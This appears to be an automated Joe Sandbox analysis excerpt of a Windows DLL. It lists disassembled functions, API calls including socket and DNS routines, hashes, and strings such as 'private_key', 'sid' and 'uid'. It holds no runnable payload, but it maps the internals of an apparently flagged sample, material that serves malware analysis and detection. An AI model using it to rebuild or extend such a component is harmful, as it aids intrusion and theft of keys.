                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _free.LIBCMT ref: 100128FF
                                                        • Part of subcall function 10008F9C: _free.LIBCMT ref: 10008FAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$H_prolog$ErrorFreeHeapLast
                                                      • String ID: device$plug_ids$sid
                                                      • API String ID: 134051451-977494499
                                                      • Opcode ID: 5ea2fee5a0c9fc4f50834f6979097f9df585b9c0cd4635544c2940b687deb193
                                                      • Instruction ID: 3f0808df7f20e6c0ce64670c10651f41c15fc23708fe5e9afe7c08bb42e6ca24
                                                      • Opcode Fuzzy Hash: 5ea2fee5a0c9fc4f50834f6979097f9df585b9c0cd4635544c2940b687deb193
                                                      • Instruction Fuzzy Hash: 4F51A0B5900198EEEB05CB74CC45BEDBBB9FF49340F1041ADE446AB196DB706E88CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10007706
                                                        • Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17
                                                      • _free.LIBCMT ref: 10007883
                                                      • _free.LIBCMT ref: 10007898
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$_free
                                                      • String ID: data$msg$res
                                                      • API String ID: 2563830877-3980117613
                                                      • Opcode ID: 862d76a29c2dec90051991f26c3cc1d67e65dd21bc684fabf0a2797ddb8bb131
                                                      • Instruction ID: 3fcbf712e36f12b6888734473e68dc3a077dfffe0d576fe19f48313bd6c7c2f3
                                                      • Opcode Fuzzy Hash: 862d76a29c2dec90051991f26c3cc1d67e65dd21bc684fabf0a2797ddb8bb131
                                                      • Instruction Fuzzy Hash: 4E51AD74D00199EEEB06DF64CC45BEDBB79FF05384F5080A9E00AA7196DB746E89CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10012597
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _free.LIBCMT ref: 10012707
                                                      • _free.LIBCMT ref: 1001271C
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                        • Part of subcall function 10008F9C: _free.LIBCMT ref: 10008FAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$H_prolog$ErrorFreeHeapLast
                                                      • String ID: device$sid$version
                                                      • API String ID: 134051451-1479437089
                                                      • Opcode ID: 82b5cea9db81fd9ded34504d21c4d6f2b23cc87abe22488c426c86dec813310a
                                                      • Instruction ID: 0c8dda4f27c5469a62dd08be8a99df0db697d51d5011bfe7e545aed121ea5e8d
                                                      • Opcode Fuzzy Hash: 82b5cea9db81fd9ded34504d21c4d6f2b23cc87abe22488c426c86dec813310a
                                                      • Instruction Fuzzy Hash: 93517EB5900258EEEB15DFA4CC45BEEBB79FF45340F1441AEE00AA7196DB706E84CB60
                                                      APIs
                                                      • _memmove.LIBCMT ref: 100162B8
                                                      • _memmove.LIBCMT ref: 100162E5
                                                      • _memmove.LIBCMT ref: 1001631B
                                                      • _memmove.LIBCMT ref: 10016334
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1001636D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                      • String ID: deque<T> too long
                                                      • API String ID: 279611364-309773918
                                                      • Opcode ID: 2a362c45092fa91b740383e07cdc9f783978205ec6e99cd1913ac18cdf3ebdc1
                                                      • Instruction ID: 784c8dabccd0a6210e0a94bf7cb842966d568d9ccd1820f8fb5e6c9047be17b7
                                                      • Opcode Fuzzy Hash: 2a362c45092fa91b740383e07cdc9f783978205ec6e99cd1913ac18cdf3ebdc1
                                                      • Instruction Fuzzy Hash: 7741F776A00A15AFCB14CE69CD8165EB7F5EF44260B11863CEC25EB780DB31FE54C690
                                                      APIs
                                                      • _memmove.LIBCMT ref: 100099A0
                                                      • _memmove.LIBCMT ref: 100099CD
                                                      • _memmove.LIBCMT ref: 10009A03
                                                      • _memmove.LIBCMT ref: 10009A1C
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009A55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                      • String ID: deque<T> too long
                                                      • API String ID: 279611364-309773918
                                                      • Opcode ID: 80f878e772d514ee3649cda1280fdb71b672c2027185422bf1bd75d506dc88d2
                                                      • Instruction ID: c33eebfb5094b413b489a485585810ec97f9a99f418be5463e29e809b8ca8558
                                                      • Opcode Fuzzy Hash: 80f878e772d514ee3649cda1280fdb71b672c2027185422bf1bd75d506dc88d2
                                                      • Instruction Fuzzy Hash: B541E272B00615AFDB14CEA9DD9155EB7F5EF412A0B12863CE829E7684D731FE01CAC0
                                                      APIs
                                                      • _memmove.LIBCMT ref: 10009AF5
                                                      • _memmove.LIBCMT ref: 10009B22
                                                      • _memmove.LIBCMT ref: 10009B58
                                                      • _memmove.LIBCMT ref: 10009B71
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009BAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                      • String ID: deque<T> too long
                                                      • API String ID: 279611364-309773918
                                                      • Opcode ID: e2ce87b9cf77c3e13f760d8457cfe9c59b6ca1b33e55e24669dc7f2a1a5012b7
                                                      • Instruction ID: db1164e802a4458a3ce7583a04cbe5f548d023cd19655491dc9812bad43fda5d
                                                      • Opcode Fuzzy Hash: e2ce87b9cf77c3e13f760d8457cfe9c59b6ca1b33e55e24669dc7f2a1a5012b7
                                                      • Instruction Fuzzy Hash: FD41D372A00615AFDB14CE69DD8155EB7E5EF802A0B11863CE829E7684DB31FE05CAD0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 10026482
                                                      • _free.LIBCMT ref: 100264B5
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _malloc.LIBCMT ref: 100264FC
                                                      • WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,000000FF,00000000), ref: 10026544
                                                      • WSAGetLastError.WS2_32 ref: 10026580
                                                        • Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?), ref: 10026961
                                                        • Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 100269C0
                                                        • Part of subcall function 10026910: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A19
                                                        • Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A2B
                                                        • Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 10026A6A
                                                      • GetCurrentThreadId.KERNEL32 ref: 100265A3
                                                      • GetCurrentThreadId.KERNEL32 ref: 100265C7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CurrentThread$EnterErrorFreeHeapLastLeave$EventsMultipleWait_free_malloc
                                                      • String ID:
                                                      • API String ID: 1895213536-0
                                                      • Opcode ID: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
                                                      • Instruction ID: 0298792182ec29e5365059a5bbda46a15199a9bf932673d6ad35eb89bca77991
                                                      • Opcode Fuzzy Hash: f7a06b46e9486587628fea5504a0f07a6cf29015283a740d158dcf7141585061
                                                      • Instruction Fuzzy Hash: 094158B0700B629FD710DF25DC84B6ABBE5FF48394F904629E855C7684EB70E854CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_free
                                                      • String ID: private_key$res$uid
                                                      • API String ID: 271808718-3738858810
                                                      • Opcode ID: 4f016080850609360ca2d250ea354d0cf53dd12af1ea2d0b169f73934801bb16
                                                      • Instruction ID: b6013081ae0201dd2ab21c5d2a27a229817cca7cbcb5dc17cd26a2df307d9ed3
                                                      • Opcode Fuzzy Hash: 4f016080850609360ca2d250ea354d0cf53dd12af1ea2d0b169f73934801bb16
                                                      • Instruction Fuzzy Hash: 5341CFB5C00149AEEB06DF64CC45BEEBBB8FF45250F50816AE046A7191DF747E88CB60
                                                      APIs
                                                      • getaddrinfo.WS2_32(?,00000000,00000100,?), ref: 1002550F
                                                      • _free.LIBCMT ref: 10025524
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • WSASetLastError.WS2_32(00000000), ref: 10025531
                                                      • _memmove.LIBCMT ref: 1002557D
                                                      • freeaddrinfo.WS2_32(?), ref: 1002558B
                                                      • htons.WS2_32(00000000), ref: 10025599
                                                      • WSASetLastError.WS2_32(00002AF9), ref: 100255BF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$FreeHeap_free_memmovefreeaddrinfogetaddrinfohtons
                                                      • String ID:
                                                      • API String ID: 189201043-0
                                                      • Opcode ID: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
                                                      • Instruction ID: 8b64a374cbdad8b26f637beff122fe858c6ba4784a9924af0ca1a5756791f1ba
                                                      • Opcode Fuzzy Hash: d6bbbcf04e4f16ab3fda43b12ef97accaf12b863bd2168bf969dce3037045137
                                                      • Instruction Fuzzy Hash: F141BF32A047119FC314CF54D885A6BF7F5EFC8251F80861EF84A8A261EB71D944CB82
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10019FD3
                                                      • _localeconv.LIBCMT ref: 10019FE6
                                                      • __Getcvt.LIBCPMT ref: 10019FF1
                                                        • Part of subcall function 100325A1: ____lc_codepage_func.LIBCMT ref: 100325B8
                                                        • Part of subcall function 100325A1: ____mb_cur_max_func.LIBCMT ref: 100325C1
                                                        • Part of subcall function 100325A1: ____lc_locale_name_func.LIBCMT ref: 100325C9
                                                      • __Getcvt.LIBCPMT ref: 1001A01E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Getcvt$H_prolog____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                                                      • String ID: false$true
                                                      • API String ID: 1717203633-2658103896
                                                      • Opcode ID: 44d9b82f475df3b7ea79f1ec68712fc431a3278e822bead156ed747d5e2d157e
                                                      • Instruction ID: 9387084c28b85512576952066f4a55378dc9e19b25225860178136d16139c7ab
                                                      • Opcode Fuzzy Hash: 44d9b82f475df3b7ea79f1ec68712fc431a3278e822bead156ed747d5e2d157e
                                                      • Instruction Fuzzy Hash: 9721B0B5C007449ECB22CFA4C84199FBBF8EF5A310F10851FE4469B212D731EA85CBA1
                                                      APIs
                                                      • timeGetTime.WINMM(75922F30,?,?,?,?,?,?,?,?,?,?,10023517,93656AD3), ref: 1002726C
                                                      • timeGetTime.WINMM(?,000004FF,00000004,?,?,?,?,?,?,?,?,?,?,10023517,93656AD3), ref: 1002728C
                                                      • MsgWaitForMultipleObjectsEx.USER32(00000001,?,?,000004FF,00000004), ref: 100272BA
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100272D0
                                                      • TranslateMessage.USER32(?), ref: 100272E4
                                                      • DispatchMessageA.USER32(?), ref: 100272EA
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 100272F8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$PeekTimetime$DispatchMultipleObjectsTranslateWait
                                                      • String ID:
                                                      • API String ID: 443098685-0
                                                      • Opcode ID: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
                                                      • Instruction ID: 079f8dbcd54a8d9c3218eb8dc4e85431248a595f9298e6c6c7ee3261443cfdea
                                                      • Opcode Fuzzy Hash: b409c91f6c29e2725a2b8632b37c6bf6fcbb9f4073073e100586dfda6f79b800
                                                      • Instruction Fuzzy Hash: 81118F71A40219ABEB10DBA4DD86FDDB7B8EB08750F204165FA05E72D0E7B1EE448B61
                                                      APIs
                                                      Strings
                                                      • guid: %s, xrefs: 100113FC
                                                      • create guid error, xrefs: 10011397
                                                      • %08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 100113EB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateGuid__snprintf_fprintf
                                                      • String ID: %08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$create guid error$guid: %s
                                                      • API String ID: 2959897907-549114592
                                                      • Opcode ID: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
                                                      • Instruction ID: 34a024b1c78299da0623422e875facfe61a2b6fae81b3d97e7196060f838763d
                                                      • Opcode Fuzzy Hash: e4f7c53d94ba508e5d9395a5c9d7c3c913bd453e5628e8381e76af27a88afb61
                                                      • Instruction Fuzzy Hash: 89118CA6C041997EDB51D7E58C12EFFBBFC9B09602F044042FA94E9082E638E745DB70
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 10026BA4
                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 10026BCC
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 10026BD7
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 10026BE0
                                                      • WSACloseEvent.WS2_32(1001F33E), ref: 10026C12
                                                      • shutdown.WS2_32(93656AD3,00000001), ref: 10026C2A
                                                      • closesocket.WS2_32(93656AD3), ref: 10026C33
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEvent$CurrentHandleObjectSingleThreadWaitclosesocketshutdown
                                                      • String ID:
                                                      • API String ID: 701127830-0
                                                      • Opcode ID: 8cad8b222ed106d079ed3702084d24a92cf9dbfcd69efa12e1806d29ca05c049
                                                      • Instruction ID: 2f1dc53aaf80abfc29e8aaefbb56988622e6ee1a66fd8a3bf2256b625d579e69
                                                      • Opcode Fuzzy Hash: 8cad8b222ed106d079ed3702084d24a92cf9dbfcd69efa12e1806d29ca05c049
                                                      • Instruction Fuzzy Hash: E6111C34200B109BDB619F25DE88B5ABBF5FF48721F504A1DF49382AB1CB75A885CB50
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 100369AC
                                                      • GetProcAddress.KERNEL32(00000000), ref: 100369B3
                                                      • EncodePointer.KERNEL32(00000000), ref: 100369BF
                                                      • DecodePointer.KERNEL32(00000001), ref: 100369DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
